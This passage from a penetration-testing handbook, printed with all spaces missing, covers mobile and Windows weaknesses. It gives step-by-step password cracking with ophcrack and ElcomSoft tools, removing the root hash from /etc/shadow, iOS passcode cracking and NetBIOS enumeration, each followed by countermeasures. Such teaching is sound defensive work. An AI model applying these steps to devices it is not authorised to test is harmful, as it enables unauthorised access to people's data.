SizingUpMobileVulnerabilitiesItpaystofindandfixthelow-hangingfruitonyournetwork.That’swhereyougetthemostbangforyourbuck.Thefollowingmobilelaptop,phone,andtabletweaknessesshouldbefrontandcenteronyourprioritylist:
NoencryptionPoorlyimplementedencryptionNopower-onpasswordsEasilyguessed(orcracked)power-onpasswords
Forothertechnologiesandsystems(webapplications,operatingsystems,andsoon),youcanusuallyfindjustthetestingtoolyouneed.However,forfindingmobile-relatedflaws,relativelyfewsecuritytestingtoolsareavailable.Notsurprisingly,themoreexpensivetoolsoftenenableyoutouncoverthebigflawswiththeleastamountofpainandhassle.
CrackingLaptopPasswordsArguablythegreatestthreattoanybusiness’ssecurityisunencryptedlaptops.Givenalltheheadlinesandawarenessaboutthiseffectivelyinexcusablesecurityvulnerability,Ican’tbelieveit’sstillsoprevalentinbusiness.ThissectionexplorestoolsyoucanusetocrackunencryptedlaptoppasswordsonWindows,Linux,orMacOSXsystems.Youthenfindoutaboutthebasiccountermeasurestopreventthisvulnerability.
ChoosingyourtoolsMyfavoritetooltodemonstratetherisksassociatedwithunencryptedlaptopsrunningWindowsisElcomSoftSystemRecovery(www.elcomsoft.com/esr.html).YousimplyburnthistooltoaCDanduseittobootthesystemyouwanttorecover(orreset)thepasswordfrom,asshowninFigure11-1.
Figure11-1:ElcomSoftSystemRecoveryisgreatforcrackingandresettingWindowspasswordsonunprotectedlaptops.
Youhavetheoptiontoresetthelocaladministrator(orother)passwordorhaveitcrackallpasswords.It’sreallythatsimple,andit’shighlysuccessful,evenonthelatestoperatingsystems,suchasWindows8.1orWindows10.Themostdifficultandtime-
consumingthingaboutElcomSoftSystemRecoveryisdownloadingandburningittoCD.
YoucanalsouseanoldertoolforWindowscalledNTAccess(www.mirider.com/ntaccess.html)forresettinglocalWindowsaccounts.Thisprogramisn’tprettyorfancy,butitdoesthejob.Thereareothersavailableaswell.Aswithophcrack(discussedalittlelaterinthissection),ElcomSoftandNTAccessprovideanexcellentwaytodemonstratethatyouneedtoencryptyourlaptopharddrives.
Peoplewilltellyoutheydon’thaveanythingimportantorsensitiveontheirlaptops.Theydo.Evenseeminglybenignlaptopsusedfortrainingorsalescanhavetonsofsensitiveinformationthatcanbeusedagainstyourbusiness.Thisincludesspreadsheetsthatusershavecopiedfromthenetworktoworkonlocally,VPNconnectionswithstoredlogincredentials,webbrowsersthathavecachedbrowsinghistory,andevenworse,websitepasswordsthatusershavechosentosave.
Afteryouresetorcrackthelocaladministrator(orother)account,youcanlogintoWindowsandhavefullaccesstothesystem.BysimplypokingaroundusingWinHex(www.winhex.com/winhex)orsimilarorAccessEnum(https://technet.microsoft.com/en-us/library/bb897332.aspx),youcanfindsensitiveinformation,remotenetworkconnections,andcachedwebconnectionstodemonstratethebusinessrisk.Ifyouwanttodigevendeeper,youcanuseadditionaltoolsfromElcomSoft(www.elcomsoft.com/products.html),suchasElcomSoftInternetPasswordBreaker,ProactiveSystemPasswordRecovery,andAdvancedEFSDataRecoveryforuncoveringadditionalinformationfromWindowssystems.Passware(www.lostpassword.com)offersmanysimilarcommercialtoolsaswell.
IfyouwanttoperformsimilarchecksonaLinux-basedlaptop,youshouldbeabletobootfromaKnoppix(www.knoppix.net)orsimilar“live”Linuxdistributionandeditthelocalpasswdfile(often/etc/shadow)toresetorchangeit.Removetheencryptedcodebetweenthefirstandsecondcolonsforthe“root”(orwhateveruser)entryorcopythepasswordfromtheentryofanotheruserandpasteitintothatarea.PasswareKitForensiccanbeusedtodecryptMacOSXsystemsencryptedwithFileVault2.
Ifyou’rebudget-strappedandneedafreeoptionforcrackingWindowspasswords,youcanuseophcrackasastandaloneprograminWindowsbyfollowingthesesteps:
1. Downloadthesourcefilefromhttp://ophcrack.sourceforge.net.
2. Extractandinstalltheprogrambyenteringthefollowingcommand:
ophcrack-vista-livecd-3.6.0.exe(orwhateverthecurrentfilenameis)
3. LoadtheprogrambystartingtheophcrackiconfromyourStartmenu.
4. ClicktheLoadbuttonandselectthetypeoftestyouwanttorun.
Inthisexample,showninFigure11-2,I’mconnectingtoaremoteservercalledserver1.Thisway,ophcrackwillauthenticatetotheremoteserverusingmylocallylogged-inusernameandrunpwdumpcodetoextractthepasswordhashesfromtheserver’sSAMdatabase.Youcanalsoloadhashesfromthelocalmachineorfromhashesextractedduringapreviouspwdumpsession.
TheextractedpasswordhashusernameswilllooksimilartothoseshowninFigure11-3.
5. ClicktheLaunchicontobegintherainbowcrackprocess.
IfyouseethatpasswordhashesareonlyintheNTHashcolumnasshowninFigure11-3,you’llneedtomakesureyouhavedownloadedtheproperhashtablesfromhttp://ophcrack.sourceforge.net/tables.phporelsewhere.AgoodonetostartwithwouldbeVistaspecial(8.0GB).Inordertoloadnewtables,youclicktheTablesiconatthetopoftheophcrackwindowasshowninFigure11-4.
Figure11-2:LoadingpasswordhashesfromaremoteSAMdatabaseinophcrack.
Figure11-3:Usernamesandhashesextractedviaophcrack.
Figure11-4:Loadingtherequiredhashtablesinophcrack.
Ifnecessary,relaunchtherainbowcrackprocessinStep5.Theprocesscantakejustafewsecondstoseveraldays(ormore)dependingonyourcomputer’sspeedandthecomplexityofthehashesbeingcracked.
There’salsoabootableLinux-basedversionofophcrack(availableathttp://ophcrack.sourceforge.net/download.php?type=livecd)thatallowsyoutobootasystemandstartcrackingpasswordswithouthavingtologinorinstallanysoftware.
Ihighlyrecommendyouuseophcrack’sLiveCDonasamplelaptopcomputerortwotodemonstratejusthowsimpleitistorecoverpasswordsand,subsequently,sensitiveinformationfromlaptopsthatdon’thaveencryptedharddrives.It’samazinglysimple,yetpeoplestillrefusetoinvestmoneyinfulldiskencryptionsoftware.ElcomSoftSystemRecoveryisanothergreattoolforthisexercise.
CountermeasuresThebestsafeguardagainstahackerusingapasswordresetprogramagainstyoursystemsistoencryptyourharddrives.YoucanuseBitLockerinWindows,WinMagicSecureDoc(www.winmagic.com/products),orotherpreferredproductfortheplatformyoursystemsarerunningon.
Power-onpasswordssetintheBIOScanbehelpfulaswell,butthey’reoftenamerebumpintheroad.AllacriminalhastodoisresettheBIOSpasswordor,betteryet,simplyremovetheharddrivefromyourlostsystemandaccessitfromanothermachine.Youalsoneedtoensurethatpeoplecan’tgainunauthorizedphysicalaccesstoyourcomputers.Whenahackerhasphysicalaccessandyourdrivesarenotencrypted,allbetsareoff.Thatsaid,fulldiskencryptionisnotfoolproof—seethenearbysidebar,“Thefallacyoffulldiskencryption.”
ThefallacyoffulldiskencryptionItseemssimpleenoughtojustencryptyourlaptopharddrivesandbedonewithlaptopsecurity.Inaperfectworld,thatwouldbethecase,butaslongaspeopleareinvolved,Isuspectthismobileweaknesswillcontinuetoexist.
Severalproblemswithdiskencryptioncreateafalsesenseofsecurity:
Passwordselection:Yourdiskencryptionisonlyasgoodasthepassword(orpassphrase)thatwasusedtoenabletheencryption.
Keymanagement:Ifyourusersdon’thaveawaytogetintotheirsystemsiftheyforgetorlosetheirpasswords,they’llgetburnedonceanddowhateverittakesnottoencrypttheirdrivesmovingforward.Also,certaindiskencryptionsoftwaresuchasMicrosoft’sBitLockermayprovidetheoptionfor(orevenrequire)userstocarryaroundtheirdecryptionkeyonathumbdriveorsimilarstoragedevice.Imaginelosingalaptopwiththekeytothekingdomstoredrightinsidethelaptopbag!Ithappens.
Screenlocking:Thisthirdpotentiallyfatalflawwithfulldiskencryptionoccurswhenusersrefusetoensuretheirscreensarelockedwhenevertheystepawayfromtheirencryptedlaptops.Allittakesisafewsecondsforacriminaltoswipealaptoptogain—andmaintain—fullaccesstoalaptopthat’s“fullyprotected”withfulldiskencryption.
Onefinalnote,andthisisimportant:certaintypesoffulldiskencryptioncanbecrackedaltogether.Forexample,theprotectionsofferedbyBitLocker,FileVault2(MacOSX),andTrueCryptcanbefullynegatedbyaprogramfromPasswarecalledPasswareKitForensic(www.lostpassword.com/kit-forensic.htm).IcoverthisflawandotherenterprisesecurityconcernsinvolvingBitLockerinmywhitepapersavailableatwww.principlelogic.com/bitlocker.html.Furthermore,youshouldn’tbeusingTrueCryptgiventhatitsoriginaldeveloperswentdarkandflawsexistthatcanallowforfullsystemcompromise.AnotheroptionforcrackingencrypteddisksisElcomSoftForensicDiskDecryptor(www.elcomsoft.com/efdd.html).Evenwiththesevulnerabilities,fulldiskencryptioncanstillprotectyoursystemsfromthelesstechnically-inclinedpassers-bywhomightendupinpossessionofoneofyourlostorstolensystems.
CrackingPhonesandTabletsIdon’tenvyITadministratorsandinformationsecuritymanagersformanyreasonsbutespeciallywhenitcomestothebringyourowndevice(BYOD)movementtakingplaceinbusinesstoday.WithBYOD,youhavetotrustthatyourusersaremakinggooddecisionsaboutsecurity,andyouhavetofigureouthowtomanageeachandeverydevice,platform,andapp.ThismanagementtaskisarguablythegreatestchallengeITprofessionalshavefacedtothispoint.Furthercomplicatingmatters,youhavecriminalhackers,thieves,andotherhooligansdoingtheirbesttoexploitthecomplexityofitall,andit’screatingsomeseriousbusinessrisks.Therealityisthatveryfewbusinesses—andindividuals—havetheirphonesandtabletsproperlysecured.
Plentyofvendorsclaimthattheirmobiledevicemanagement(MDM)solutionsaretheanswertophoneandtabletwoes.They’reright…toanextent.MDMcontrolsthatseparatepersonalinformationfrombusinessinformationandensurethepropersecuritycontrolsareenabledatalltimescanhelpyoumakeabigleaptowardlockingdownthemobileenterprise.
Oneofthegreatestthingsyoucandotoprotectphonesandtabletsfromunauthorizeduseistoimplementthisniftysecuritycontrolthatdatesbacktothebeginningofcomputers:passwords.Yep,yourphoneandtabletusersshouldemploygoodold-fashionedpasswords(technicallypassphrases)thatareeasytorememberyethardtoguess.Passwordsareoneofthebestcontrolsyoucanhave.Yetthereareplentyofmobiledeviceswithnopasswordsorpasswordsthatareeasilycracked.
StartingwithiOS9,devicescomewitha6-characterpasscodedefault.AndroidLollipoporiginallydefaultedtoencryptingtheentiredevicealthoughthatwasreversedaftercomplaintsofperformancedegradation.
Inthefollowingsection,Idemonstrateaccessingmobiledevicesbyusingacommercialforensicstool.Keepinmindthatsuchtoolsaretypicallyrestrictedtolawenforcementpersonnelandsecurityprofessionals,buttheycouldcertainlyendupinthehandsofthebadguys.Usingsuchtoolsforyourowninformationsecuritytestingcanbeagreatwaytodemonstratethebusinessriskandmakethecaseforbettermobilecontrols.
Mobileappscanintroduceaslewofsecurityvulnerabilitiesintoyourenvironment,especiallycertainappsavailableforAndroidviaGooglePlaythataren’tproperlyvetted.InrecentsourcecodeanalysisusingCheckmarx’sCxSuite(seeChapter15),I’vefoundtheseappstohavethesameflawsastraditionalsoftware,suchasSQLinjection,hard-codedencryptionkeys,andbufferoverflowsthatcanputsensitiveinformationatrisk.Thethreatofmalwareisthereaswell.Mobileappsareyetanotherreasontogetyourmobileenvironmentunder
controlusing,ataminimum,aprovenMDMsystemsuchasMaaS360(www.maas360.com)orAirWatch(www.air-watch.com).
CrackingiOSpasswordsI’dventuretoguessthatmanyphoneandtabletpasswords(really,they’rejust4-digitPINs,orpasscodes)canbeguessedoutright.Amobiledevicegetslostorstolenandallthepersonrecoveringithastodoistrysomebasicnumbercombinationssuchas1234,1212,or0000.Soon,voilà!—thesystemisunlocked.
ManyphonesandtabletsrunningiOSandAndroidareconfiguredtowipethedeviceiftheincorrectpasswordisenteredXnumberoftimes(often10failedattempts).Areasonablesecuritycontrolindeed.Butwhatelsecanbedone?Somecommercialtoolscanbeusedtocracksimplepasswords/PINsandrecoverinformationfromlostorstolendevicesordevicesundergoingaforensicsinvestigation.
ElcomSoft’siOSForensicToolkit(http://ios.elcomsoft.com)providesameansfordemonstratingjusthoweasilypasswords/PINsoniOS-basedphonesandtabletscanbecrackedupthroughiOSversion7.Here’show:
1. PlugyouriPhone/iPod/iPadintoyourtestcomputerandplaceitintoDeviceFirmwareUpgrade(DFU)mode.
ToenterDFUmode,simplypowerthedeviceoff,holddowntheHomebutton(bottomcenter)andsleepbutton(oftentheupperrightcorner)atthesametimefor10seconds,andcontinueholdingdowntheHomebuttonforanother10seconds.Themobiledevicescreengoesblank.
2. LoadtheiOSForensicToolkitbyinsertingyourUSBlicensedongleintoyourtestcomputerandrunningTookit.cmd.
YouseethescreenshowninFigure11-5.
3. LoadtheiOSForensicToolkitRamdiskontothemobiledevicebyselectingoption2LOADRAMDISK.
LoadingtheRAMDISKcodeallowsyourtestcomputertocommunicatewiththemobiledeviceandrunthetoolsneededforcrackingthepassword(amongotherthings).
4. SelecttheiOSdevicethat’sconnected,asshowninFigure11-6.
Iselectedoption14becauseIhaveaniPhone4withGSM.
Younowseethetoolkitconnecttothedeviceandconfirmasuccessfulload,asshowninFigure11-7.YoushouldseetheElcomSoftlogointhemiddleofyourmobiledevice’sscreenaswell.
5. Tocrackthedevicespassword/PIN,simplyselectoption6GETPASSCODEonthemainmenu.
iOSForensicToolkitwillpromptyoutosavethepasscodetoafile.Youcanpress
Entertoacceptthedefaultofpasscode.txt.Thecrackingprocesswillcommenceand,withanyluck,thepasscodewillbefoundanddisplayedasshowninFigure11-8.
So,havingnopasswordforphonesandtabletsisbad,anda4-digitPINsuchasthisisnotmuchbetter.Userbeware!
YoucanalsouseiOSForensicToolkittocopyfilesandevencrackthekeychainstouncoverthepasswordthatprotectsthedevice’sbackupsiniTunes(option5GETKEYS).
UsingElcomSoft’siOSForensicToolkittocrackiOSversions8andupwon’tbequiteasfruitfulfornowasApplehasfinallystartedtoreallylockdowntheoperatingsystem.AppleiOSisstillnotwithoutitsflaws.AsrecentlyasiOS9,therewasanexploitthatallowedattackerstobypasstheloginscreenaltogether.
Ifanything,youneedtobethinkingabouthowyourbusinessinformation,whichismostcertainlypresentonphonesandtablets,isgoingtobehandledintheeventoneofyouremployee’sdevicesisseizedbylawenforcementpersonnel.Sure,they’llfollowtheirchain-of-custodyprocedures,butoverall,they’llhaveverylittleincentivetoensuretheinformationstaysprotectedinthelongterm.
Figure11-5:iOSForensicToolkit’smainpage.
Figure11-6:SelecttheappropriateiOSdevicefromthelist.
Figure11-7:iOSForensicToolkitRamdiskloadingsuccessfully.
Figure11-8:Crackinga4-digitPINonaniPhone.
Becarefulwithhowyousyncyourmobiledevicesand,especially,wherethefilebackupsarestored.Theymaybeoffinthewildblueyonder(thecloud),whichmeansyouhavenorealwaytogaugehowsecurethepersonalandbusinessinformationtrulyis.Ontheotherhand,whensynchedfilesandbackupsarestoredwithoutapassword,withaweakpassword,oronanunencryptedlaptop,everythingisstillatriskgiventhetoolsavailabletocracktheencryptionusedtoprotectthisinformation.Forinstance,ElcomSoft’sPhoneBreaker(www.elcomsoft.com/eppb.html)canbeusedtounlockbackupsfromBlackBerryandAppledevicesaswellasrecoveronlinebackupsmadetoiCloudandWindowsLive!.
OxygenForensicSuite(www.oxygen-forensic.com)isanalternativecommercialtoolthatcanbeusedforcrackingiOS-basedpasswordsaswellasadditionalrecoveryfunctionalityforAndroid-basedsystems.Figure11-9showstheOxygenForensicSuiteinterfaceandtypesofinformationthatcanbeextractedfromanAndroid-baseddevice.TheOxygenForensicSuiteExtractortoolcanconnectandextractthisinformationrelativelyquickly—somethingthatcan,ofcourse,beusedagainstyourorganizationwhenmobiledevicesarelostorstolen.
Figure11-9:OxygenForensicSuite.
OxygenForensicSuiteisalsogreatforperformingsecurityassessmentsofmobileapps,whichIcoverinChapter15.
CountermeasuresagainstpasswordcrackingThemostrealisticwaytopreventsuchpasswordcrackingistorequire—andcontinuallyenforce—strongpasswordssuchasmulti-digitPINsconsistingof5ormorenumbersor,betteryet,complexpassphrasesthatareveryeasytorememberyetpracticallyimpossibletocracksuchasProgressive_r0ck_rules!.MDMcontrolscanhelpyouenforcesuchapolicy.You’lllikelygetpushbackfromemployeesandmanagement,butit’stheonlysurebettohelppreventthisattack.Icovergettingbuy-inforyoursecurityinitiativesinChapter20.Goodluck!
HackingtheInternetofThingsNochapteronmobiledeviceswouldbecompletewithoutsomecoverageoftheInternetofThings(IoT).Computersystemsthatfallintothis“IoT”includeeverythingfromhomealarmsystemstomanufacturingequipmenttocoffeepotsandprettymuchanythinginbetween.Evenautomobilescannowbehackedasyou’velikelyheardaboutinthehighlypublicizedhackagainstaJeepCherokeein2015.
CiscoSystemshasestimatedthattheIoTwillgrowto50billiondevicesby2020!PerhapsthisiswhyallIPv4addressesarenowgone.I’mnotsurethatthat’sagoodthingformostpeople,butitcertainlysoundslikejobsecurityforthoseofusworkinginthisindustry.Ifyou’regoingtolockdownIoTsystems,youmustfirstunderstandhowthey’revulnerable.GiventhatIoTsystemsarenotunlikeothernetworksystems(i.e.,theyhaveanIPaddressand/orawebinterface),you’llbeabletousestandardvulnerabilityscannerstouncoverflaws.AdditionalsecuritychecksyoushouldrunonIoTsystemsinclude:
Whatinformationisstoredonthesystem(i.e.,sensitivecustomerinformation,intellectualproperty,orbiodatafromdevicessuchasFitbitsandAppleWatches)?Ifsystemsarelostorstolen,isthatgoingtocreatebusinessrisks?
Howisinformationcommunicatedtoandfromeachsystem?Isitencrypted?
Arepasswordsrequired?Whatarethedefaultpasswordcomplexitystandards?Cantheybechanged?Doesintruderlockoutexisttohelppreventpasswordcracking?
Whatpatchesaremissingthatfacilitatesecurityexploits?Aresoftwareupdatesevenavailable?
Howdothesystemsstandupundervulnerabilityscansand,evenmoreso,simulateddenialofserviceattacks?
WhatadditionalsecuritypoliciesneedtobeinputinplacetoaddressIoTsystems?
Justlikeanyothersysteminyournetworkenvironment,IoTsystems,devices,andwidgets(orwhateveryoucallthem)needtobeincludedinthescopeofyoursecuritytesting.Ifthey’renot,vulnerabilitiescouldbelurkingthatifeventuallyexploitedcanleadtoabreachorpotentiallyevenmorecatastrophicsituation.
HackingOperatingSystems
Visitwww.dummies.com/extras/hackingformoregreatDummiescontentonline.
Inthispart…Nowthatyou’repastthenetworklevel,it’stimetogetdowntothenitty-gritty—thosefunoperatingsystemsyouuseonadailybasisandhavecometobothlove(andhate).Idefinitelydon’thaveenoughroominthisbooktocovereveryoperatingsystemversionoreveneveryoperatingsystemvulnerability,butIcertainlyhittheimportantparts—especiallytheonesthataren’teasilyfixedwithpatches.
Thispartstartsbylookingatthemostwidelyused(andpickedon)operatingsystem—MicrosoftWindows.FromWindowsXP(yep,it’sstilloutthere!)toWindows10andServer2016,Ishowyousomeofthebestwaystoattacktheseoperatingsystemsandsecurethemfromthebadguys.ThispartthenlooksatLinuxanditslesspublicized(yetstillmajor)securityflaws.ManyofthehacksandcountermeasuresIcovercanapplytomanyotherflavorsofUNIXand,yes,evenMacOSXaswell.
WindowsInThisChapter
PortscanningWindowssystems
GleaningWindowsinformationwithoutloggingin
CatchingtheWindowssecurityflawsyoudon’twanttooverlook
ExploitingWindowsvulnerabilities
MinimizingWindowssecurityrisks
MicrosoftWindows(withsuchversionsasWindows7;WindowsServer2012;Windows8.1;andthenewestflavor,Windows10)isthemostwidelyusedoperatingsystem(OS)intheworld.It’salsothemostwidelyabused.IsthisbecauseMicrosoftdoesn’tcareasmuchaboutsecurityasotherOSvendors?Theshortansweris“no.”Sure,numeroussecurityflawswereoverlooked—especiallyintheWindowsNTdays—butMicrosoftproductsaresopervasivethroughouttoday’snetworksthatMicrosoftistheeasiestvendortopickon;therefore,Microsoftproductsoftenendupinthebadguys’crosshairs.Theonepositiveaboutcriminalhackersisthatthey’redrivingtherequirementforbettersecurity!
Manyofthesecurityflawsintheheadlinesaren’tnew.They’revariantsofvulnerabilitiesthathavebeenaroundforalongtime.You’veheardthesaying,“Themorethingschange,themoretheystaythesame.”Thatapplieshere,too.MostWindowsattacksarepreventableifthepatchesareproperlyapplied.Thus,poorsecuritymanagementisoftentherealreasonWindowsattacksaresuccessful,yetMicrosofttakestheblameandmustcarrytheburden.
InadditiontothepasswordattacksIcoverinChapter8,manyotherattacksarepossibleagainstaWindows-basedsystem.TonsofinformationcanbeextractedfromWindowsbysimplyconnectingtothesystemacrossanetworkandusingtoolstoextracttheinformation.Manyofthesetestsdon’tevenrequireyoutobeauthenticatedtotheremotesystem.AllsomeonewithmaliciousintentneedstofindonyournetworkisavulnerableWindowscomputerwithadefaultconfigurationthat’snotprotectedbysuchmeasuresasapersonalfirewallandthelatestsecuritypatches.
Whenyoustartpokingaroundonyournetwork,youmightbesurprisedathowmanyofyourWindows-basedcomputershavesecurityvulnerabilities.Furthermore,you’llbeevenmoresurprisedatjusthoweasyitistoexploitvulnerabilitiestogaincompleteremotecontrolofWindowsbyusingatoolsuchasMetasploit.AfteryouconnecttoaWindowssystemandhaveavalidusernameandpassword(byknowingitorderivingitbyusingthepassword-crackingtechniquesdiscussedinChapter8orothertechniquesoutlinedinthischapter),youcandigdeeperandexploitotheraspectsofWindows.
Thischaptershowsyouhowtotestforsomeofthelow-hangingfruitinWindows(the
flawsthatgetpeopleintotroublethemost)andoutlinescountermeasurestomakesureyourWindowssystemsaresecure.
IntroducingWindowsVulnerabilitiesGivenWindows’easeofuse,itsenterprise-readyActiveDirectoryservice,andthefeature-rich.NETdevelopmentplatform,mostorganizationsusetheMicrosoftplatformformuchoftheirnetworkingandcomputingneeds.Manybusinesses—especiallythesmall-tomedium-sizedones—dependsolelyontheWindowsOSfornetworkusage.Manylargeorganizationsruncriticalservers,suchaswebserversanddatabaseservers,ontheWindowsplatformaswell.Ifsecurityvulnerabilitiesaren’taddressedandmanagedproperly,theycanbringanetworkoranentireorganization(largeorsmall)toitsknees.
WhenWindowsandotherMicrosoftsoftwareareattacked—especiallybyawidespreadInternet-basedwormorvirus—hundredsofthousandsoforganizationsandmillionsofcomputersareaffected.Manywell-knownattacksagainstWindowscanleadtothefollowingproblems:
Leakageofsensitiveinformation,includingfilescontaininghealthcareinformationandcreditcardnumbersPasswordsbeingcrackedandusedtocarryoutotherattacksSystemstakencompletelyofflinebydenialofservice(DoS)attacksFullremotecontrolbeingobtainedEntiredatabasesbeingcopiedordeleted
WhenunsecuredWindows-basedsystemsareattacked,seriousthingscanhappentoatremendousnumberofcomputersaroundtheworld.
ChoosingToolsLiterallyhundredsofWindowshackingandtestingtoolsareavailable.Thekeyistofindasetoftoolsthatcandowhatyouneedandthatyou’recomfortableusing.
Manysecuritytools—includingsomeofthetoolsinthischapter—workwithonlycertainversionsofWindows.Themostrecentversionofeachtoolinthischaptershouldbecompatiblewithcurrently-supportedversionsofWindows(Windows7andWindowsServer2008R2andnewer),butyourmileagemayvary.
Ihavefoundthatthemoresecuritytoolsandother“poweruser”applicationsyouinstallinWindows—especiallyprogramsthattieintothenetworkdriversandTCP/IPstack—themoreunstableWindowsbecomes.I’mtalkingaboutslowperformance,generalinstabilityissues,andeventheoccasionalbluescreensofdeath.Unfortunately,oftentheonlyfixistoreinstallWindowsandallyourapplications.Afteryearsofrebuildingmytestingsystemseveryfewmonths,IfinallywisedupandboughtacopyofVMwareWorkstationandadedicatedcomputerthatIcanjunkupwithtestingtoolswithoutworryingaboutitaffectingmyabilitytogetmyotherworkdone.(Ah,thememoriesofthoseDOSandWindows3.xdayswhenthingsweremuchsimpler!)
FreeMicrosofttoolsYoucanusethefollowingfreeMicrosofttoolstotestyoursystemsforvariousweaknesses:
Built-inWindowsprogramsforNetBIOSandTCP/UDPserviceenumeration,suchasthesethree:
nbtstatforgatheringNetBIOSnametableinformationnetstatfordisplayingopenportsonthelocalWindowssystemnetforrunningvariousnetwork-basedcommands,includingviewingsharesonremoteWindowssystemsandaddinguseraccountsafteryougainaremotecommandpromptviaMetasploit
MicrosoftBaselineSecurityAnalyzer(MBSA)(https://technet.microsoft.com/en-us/security/cc184924.aspx)totestformissingpatchesandbasicWindowssecuritysettingsSysinternals(http://technet.microsoft.com/en-us/sysinternals/default.aspx)topoke,prod,andmonitorWindowsservices,processes,andresourcesbothlocallyandoverthenetwork
All-in-oneassessmenttoolsAll-in-onetoolsperformawidevarietyofsecuritytests,includingthefollowing:
PortscanningOSfingerprintingBasicpasswordcrackingDetailedvulnerabilitymappingsofthevarioussecurityweaknessesthatthetoolsfindonyourWindowssystems
Itypicallyusethesetoolsinmyworkwithverygoodresults:
GFILanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)Nexpose(www.rapid7.com/products/nexpose)
Task-specifictoolsThefollowingtoolsperformmorespecifictasksforuncoveringWindows-relatedsecurityflaws.ThesetoolsprovidedetailedinsightintoyourWindowssystemsandprovideinformationthatyoumightnototherwisegetfromall-in-oneassessmenttools:
Metasploit(www.metasploit.com)forexploitingvulnerabilitiesthatsuchtoolsasNexposeandQualysdiscovertoobtainremotecommandprompts,addusers,setupremotebackdoors,andmuchmoreNetScanToolsPro(www.netscantools.com)forportscanning,pingsweeps,andshareenumerationSoftPerfectNetworkSecurityScanner(www.softperfect.com/products/networkscanner)forportscanningandshareenumerationTCPView(http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx)toviewTCPandUDPsessioninformationWinfo(www.ntsecurity.nu/toolbox/winfo)fornullsessionenumerationtogathersuchconfigurationinformationassecuritypolicies,localuseraccounts,andshares
KeepinmindthatdisablingtheWindowsFirewall(orotherthird-partyfirewallthat’srunningonyourtestsystem)canhelpspeedthingsup.Dittoforanti-virussoftware—justbecareful.Ifpossible,runyoursecuritytestsusingadedicatedsystemorvirtualmachine,becausedoingsominimizesanyimpactyourtestresultsmayhaveontheotherworkyoudoonyourcomputer.
GatheringInformationAboutYourWindowsVulnerabilities
WhenyouassessWindowsvulnerabilities,startbyscanningyourcomputerstoseewhatthebadguyscansee.
TheexploitsinthischapterwererunagainstWindowsfrominsideafirewall,ontheinternalnetwork.UnlessIpointoutotherwise,allthetestsinthischaptercanberunagainstallversionsoftheWindowsOS.Theattacksinthischapteraresignificantenoughtowarranttestingfor,regardlessofyourcurrentsetup.YourresultswillvaryfromminedependingonthespecificversionofWindows,patchlevels,andothersystemhardeningyou’vedone.
SystemscanningAfewstraightforwardprocessescanidentifyweaknessesinWindowssystems.
TestingStartgatheringinformationaboutyourWindowssystemsbyrunninganinitialportscan:
1. RunbasicscanstofindwhichportsareopenoneachWindowssystem:
ScanforTCPportswithaportscanningtool,suchasNetScanToolsPro.TheNetScanToolsProresultsshowninFigure12-1revealseveralpotentiallyvulnerableportsopenonaWindows7system,includingthoseforDNS(UDPport53);theever-popular—andeasilyhacked—NetBIOS(port139);andSQLServer(UDP1434).
2. PerformOSenumeration(suchasscanningforsharesandspecificOSversions)byusinganall-in-oneassessmenttool,suchasLanGuard.
Figure12-2showsaLanGuardscanthatrevealstheserverversion,vulnerabilities,openports,andmore.
Asyoucansee,GFIranksAutoRun-enabledandsource-routedpacketsfromarbitraryhostsas“High”SecurityVulnerabilities.IdiscussthesubjectofvulnerabilityprioritizationinChapter17.
IfyouneedtoquicklyidentifythespecificversionofWindowsthat’srunning,youcanuseNmap(http://nmap.org/download.html)withthe-Ooption,asshowninFigure12-3.
OtherOSfingerprintingtoolsareavailable,butI’vefoundNmaptobeone
ofthemostaccurate.
3. Determinepotentialsecurityvulnerabilities.
Thisissubjectiveandmightvaryfromsystemtosystem,butwhatyouwanttolookforareinterestingservicesandapplicationsandproceedfromthere.
Figure12-1:PortscanningaWindows7systemwithNetScanToolsPro.
Figure12-2:GatheringportandvulnerabilitydetailsfromaWindows-basedwebserverwithLanGuard.
Figure12-3:UsingNmaptodeterminetheWindowsversion.
CountermeasuresagainstsystemscanningYoucanpreventanexternalattackerormaliciousinternaluserfromgatheringcertaininformationaboutyourWindowssystemsbyimplementingthepropersecuritysettingsonyournetworkandontheWindowshosts.Youhavethefollowingoptions:
Useanetworkfirewallorwebapplicationfirewall(WAF)forsystemsrunningInternetInformationServices(IIS).UsetheWindowsFirewallorotherpersonalfirewallsoftwareoneachsystem.YouwanttoblocktheWindowsnetworkingportsforRPC(port135)andNetBIOS(ports137–139and445).Disableunnecessaryservicessothattheydon’tappearwhenaconnectionismade.
NetBIOSYoucangatherWindowsinformationbypokingaroundwithNetBIOS(NetworkBasicInput/OutputSystem)functionsandprograms.NetBIOSallowsapplicationstomakenetworkingcallsandcommunicatewithotherhostswithinaLAN.
TheseWindowsNetBIOSportscanbecompromisediftheyaren’tproperlysecured:
UDPportsfornetworkbrowsing:Port137(NetBIOSnameservices,alsoknownasWINS)Port138(NetBIOSdatagramservices)
TCPportsforServerMessageBlock(SMB):Port139(NetBIOSsessionservices,alsoknownasCIFS)Port445(runsSMBoverTCP/IPwithoutNetBIOS)
Hacks
ThehacksdescribedinthefollowingtwosectionscanbecarriedoutonunprotectedsystemsrunningNetBIOS.
Unauthenticatedenumeration
Whenyou’reperformingyourunauthenticatedenumerationtests,youcangatherconfigurationinformationaboutthelocalorremotesystemstwoways:
Usingall-in-onescanners,suchasLanGuardorNexposeUsingthenbtstatprogramthat’sbuiltintoWindows(nbtstatstandsforNetBIOSoverTCP/IPStatistics)
Figure12-4showsinformationthatyoucangatherfromaWindows7systemwithasimplenbtstatquery.
Figure12-4:UsingnbtstattogatherinformationonaWindows7system.
nbtstatshowstheremotecomputer’sNetBIOSnametable,whichyougatherbyusingthenbtstat-Acommand.Thisdisplaysthefollowinginformation:
ComputernameDomainnameComputer’sMACaddress
AnadvancedprogramsuchasNexposeisn’tnecessarytogatherthisbasicinformationfromaWindowssystem.However,thegraphicalinterfaceofferedbycommercialsoftwaresuchasthispresentsitsfindingsinaprettierfashionandisoftenmucheasiertouse.Additionally,youhavethebenefitofgatheringtheinformationyouneedwithonetool.
Shares
Windowsusesnetworksharestosharecertainfoldersordrivesonthesystemsoother
